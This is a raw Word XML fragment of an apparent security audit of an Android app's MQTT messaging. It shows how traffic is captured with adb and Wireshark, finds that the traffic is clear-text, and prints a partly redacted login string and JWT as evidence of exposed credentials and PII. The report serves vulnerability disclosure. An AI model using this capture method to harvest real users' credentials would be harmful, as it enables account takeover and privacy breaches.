                      <wps:cNvPr id="17" name="Graphic 17"/>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5.203735pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15725568;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape10" coordorigin="1440,304" coordsize="2880,0" path="m1440,304l4320,304e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cloud.google.com/identity-platform/docs/password-policy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/.../Authentication_Cheat_Sheet.html#...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/MQTT</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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>generate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>traffic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Retrieve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>capture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>pull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>adb pull </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/data/local/tmp/mqtt.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Opening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>PCAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reveals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>clear-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>MQTT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="105"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487591424">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1417421</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>228327</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5403895" cy="2988373"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="18" name="Image 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="18" name="Image 18"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5403895" cy="2988373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="73"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confirming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>clear-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MQTT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>PII</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>above,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trivially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>extracted:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>login:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ÛMQTTÀ&lt;paho96247477565425$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e965dd5f-8df8-4478-b51c-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>f3ac82fac134eyJhbG[...]v9Jr1Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Additionally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>base64-decoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>middle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>portion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>JWT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reveals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
